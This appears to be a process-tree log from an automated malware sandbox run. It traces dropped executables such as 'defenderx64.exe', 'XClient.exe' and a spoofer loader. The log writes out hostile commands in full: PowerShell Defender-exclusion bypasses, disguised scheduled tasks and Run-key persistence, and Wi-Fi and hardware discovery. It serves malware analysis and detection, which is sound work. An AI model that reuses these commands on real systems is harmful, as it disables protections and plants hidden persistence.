C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"5⤵
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe csproduct get uuid6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f"5⤵
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Windows\system32\reg.exereg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f6⤵
- Modifies registry key
PID:2084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f"5⤵
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f6⤵
- Adds Run key to start application
- Modifies registry key
PID:548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"5⤵
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe csproduct get uuid6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"5⤵
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe csproduct get uuid6⤵PID:4056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"5⤵PID:3856
-
C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe csproduct get uuid6⤵PID:4048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2112 -
C:\Windows\system32\netsh.exenetsh wlan show profiles6⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4324
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1384 -
C:\Windows\system32\netsh.exenetsh wlan show profiles6⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4656 -
C:\Windows\system32\netsh.exenetsh wlan show profiles6⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3244
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\defender64.exe"C:\Users\Admin\AppData\Local\Temp\Files\defender64.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:3412
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:4720
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QZgPafBWcYU9.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:896 -
C:\Windows\system32\chcp.comchcp 650016⤵PID:3876
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3784
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1232 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:3504
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mELwuib5UybG.bat" "7⤵PID:1364
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:60
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1712
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4220 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:4452
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6E3X8WiwvUwh.bat" "9⤵PID:4476
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:3140
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3396
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4432 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:548
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VXnxqiGe3G6n.bat" "11⤵PID:1748
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:1916
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4332
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"12⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1092 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
PID:2516
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KSjEVP6OrY2A.bat" "13⤵PID:2024
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:2364
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3868
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"14⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4344 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:4716
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iVLp1PlJBH58.bat" "15⤵PID:840
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:1364
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1384
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"16⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5592 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
PID:5704
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DfqkciqB3gt6.bat" "17⤵PID:5864
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:5904
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5920
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"18⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3876 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
PID:5952
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\46ztptCHnGpK.bat" "19⤵PID:1420
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:5000
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6064
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"20⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5320 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
PID:5740
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VPGSqvJVfqDK.bat" "21⤵PID:3780
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:5692
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5684
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"22⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5732 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f23⤵
- Scheduled Task/Job: Scheduled Task
PID:1812
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\09q7nSCy9r7Z.bat" "23⤵PID:3908
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:2684
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5940
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"24⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5300 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f25⤵
- Scheduled Task/Job: Scheduled Task
PID:6056
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qghEQaVhwFCs.bat" "25⤵PID:5460
-
C:\Windows\system32\chcp.comchcp 6500126⤵PID:1644
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5864
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"26⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5456 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f27⤵
- Scheduled Task/Job: Scheduled Task
PID:5888
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tTVbBe93fSxm.bat" "27⤵PID:5544
-
C:\Windows\system32\chcp.comchcp 6500128⤵PID:3612
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost28⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4428
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"28⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5688 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f29⤵
- Scheduled Task/Job: Scheduled Task
PID:3964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BoagpoXkLaXe.bat" "29⤵PID:2932
-
C:\Windows\system32\chcp.comchcp 6500130⤵PID:2108
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost30⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4400
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"30⤵
- Checks computer location settings
- Suspicious use of SendNotifyMessage
PID:6120 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f31⤵
- Scheduled Task/Job: Scheduled Task
PID:2308
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\I1C0UIkmY538.bat" "31⤵PID:4448
-
C:\Windows\system32\chcp.comchcp 6500132⤵PID:5396
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost32⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2068
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"32⤵
- Checks computer location settings
- Suspicious use of SendNotifyMessage
PID:2548 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f33⤵
- Scheduled Task/Job: Scheduled Task
PID:4476
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ovcqOor70TaM.bat" "33⤵PID:5888
-
C:\Windows\system32\chcp.comchcp 6500134⤵PID:4164
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost34⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5940
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"34⤵
- Checks computer location settings
- Suspicious use of SendNotifyMessage
PID:5076 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f35⤵
- Scheduled Task/Job: Scheduled Task
PID:3964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UKqmGRBPn0k8.bat" "35⤵PID:2084
-
C:\Windows\system32\chcp.comchcp 6500136⤵PID:772
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost36⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2848
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"36⤵
- Checks computer location settings
- Suspicious use of SendNotifyMessage
PID:6632 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f37⤵
- Scheduled Task/Job: Scheduled Task
PID:6796
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fIskBe03DBPB.bat" "37⤵PID:6980
-
C:\Windows\system32\chcp.comchcp 6500138⤵PID:5380
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost38⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1612
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"38⤵
- Suspicious use of SendNotifyMessage
PID:5764 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f39⤵
- Scheduled Task/Job: Scheduled Task
PID:6396
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JIjYcd59I18Z.bat" "39⤵PID:2912
-
C:\Windows\system32\chcp.comchcp 6500140⤵PID:5308
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost40⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4988
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"40⤵
- Suspicious use of SendNotifyMessage
PID:7028 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f41⤵
- Scheduled Task/Job: Scheduled Task
PID:1628
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pc1mnkgC20Ww.bat" "41⤵PID:1100
-
C:\Windows\system32\chcp.comchcp 6500142⤵PID:6172
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost42⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6288
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"42⤵
- Checks computer location settings
- Suspicious use of SendNotifyMessage
PID:4372 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f43⤵
- Scheduled Task/Job: Scheduled Task
PID:836
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\M5bcxhZlDmsV.bat" "43⤵PID:4988
-
C:\Windows\system32\chcp.comchcp 6500144⤵PID:2552
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost44⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2644
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"44⤵
- Checks computer location settings
- Suspicious use of SendNotifyMessage
PID:6924 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f45⤵
- Scheduled Task/Job: Scheduled Task
PID:6508
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bdGq7NdB0MTx.bat" "45⤵PID:516
-
C:\Windows\system32\chcp.comchcp 6500146⤵PID:5352
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost46⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6572
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"46⤵
- Checks computer location settings
PID:5036 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f47⤵
- Scheduled Task/Job: Scheduled Task
PID:1204
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5skoieoTK1EW.bat" "47⤵PID:2412
-
C:\Windows\system32\chcp.comchcp 6500148⤵PID:4760
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost48⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5196
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"48⤵
- Checks computer location settings
PID:4360 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f49⤵
- Scheduled Task/Job: Scheduled Task
PID:5632
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\k7UU30a8zKWs.bat" "49⤵PID:4428
-
C:\Windows\system32\chcp.comchcp 6500150⤵PID:5660
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost50⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2192
-
-
C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"C:\Users\Admin\AppData\Roaming\en\defenderx64.exe"50⤵PID:1384
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Defender Helper" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\en\defenderx64.exe" /rl HIGHEST /f51⤵
- Scheduled Task/Job: Scheduled Task
PID:5392
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3076
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:1944
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\30072024.exe"C:\Users\Admin\AppData\Local\Temp\Files\30072024.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:4560
-
-
C:\Users\Admin\AppData\Local\Temp\Files\random.exe"C:\Users\Admin\AppData\Local\Temp\Files\random.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2620
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Reaper%20cfx%20Spoofer%20V2.exe"C:\Users\Admin\AppData\Local\Temp\Files\Reaper%20cfx%20Spoofer%20V2.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:928 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cfx.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cfx.exe4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:548 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls5⤵PID:3832
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls5⤵PID:228
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Pause5⤵PID:4512
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls5⤵PID:4520
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Pause5⤵PID:3748
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Loader.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Loader.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops autorun.inf file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4784 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svchost.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Loader.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:4416
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "WINDOWSSYSTEMHOST" /tr "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Loader.exe" /sc MINUTE /MO 15⤵
- Scheduled Task/Job: Scheduled Task
PID:4332 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4512
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\kmvcsaed.exe"C:\Users\Admin\AppData\Local\Temp\Files\kmvcsaed.exe"3⤵
